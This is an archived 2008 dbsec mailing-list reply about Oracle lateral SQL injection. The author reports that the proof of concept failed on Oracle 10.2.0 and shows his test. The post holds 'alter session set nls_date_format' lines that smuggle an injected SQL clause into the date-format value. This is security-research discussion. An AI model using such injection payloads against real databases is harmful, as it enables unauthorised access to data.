[dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required

• From: "Richard Slide" <richard.slide@xxxxxxxxx>
• To: dbsec@xxxxxxxxxxxxx
• Date: Sat, 19 Jul 2008 17:07:29 +0200

Hello,

I have try your POC in oracle 10.2.0 and its seems dosen't work.

Do you have test it only in oracle 11 ?

this what i do .

I create on my db the user : usertest1 with password usertest1

then after
alter session set nls_date_format='"'' and myfunc()=1--"'; or
alter session set nls_date_format='"'' and 1=1--"';

select sysdate from dual;


SYSDATE
------------------
2008-07-19


Does this flow work only in oracle 11 ?


Cheers

Richard

• Follow-Ups:
  • [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
    • From: David Litchfield

Other related posts:

• » [dbsec] Lateral SQL Injection Revisited - No Special Privs Required
• » [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
• » [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
• » [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required

1. Home
2. dbsec
3. Archive
4. 07-2008

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---